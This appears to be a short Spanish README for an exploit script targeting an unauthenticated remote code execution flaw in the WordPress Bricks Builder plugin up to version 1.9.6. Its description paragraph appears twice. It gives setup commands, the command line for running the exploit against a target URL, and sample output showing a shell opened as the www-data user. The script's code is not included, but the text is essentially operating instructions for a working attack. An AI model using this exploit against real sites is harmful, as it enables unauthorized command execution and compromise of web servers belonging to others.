
Vulnerabilidad de ejecución remota de código no autenticada en WordPress Bricks Builder <= 1.9.6. El endpoint de renderizado de plantillas acepta código PHP sin autenticación, permitiendo la ejecución arbitraria de comandos como el usuario del servidor web.
Vulnerabilidad de ejecución remota de código no autenticada en WordPress Bricks Builder <= 1.9.6. El endpoint de renderizado de plantillas acepta código PHP sin autenticación, permitiendo la ejecución arbitraria de comandos como el usuario del servidor web.
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET
Ejemplo:
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)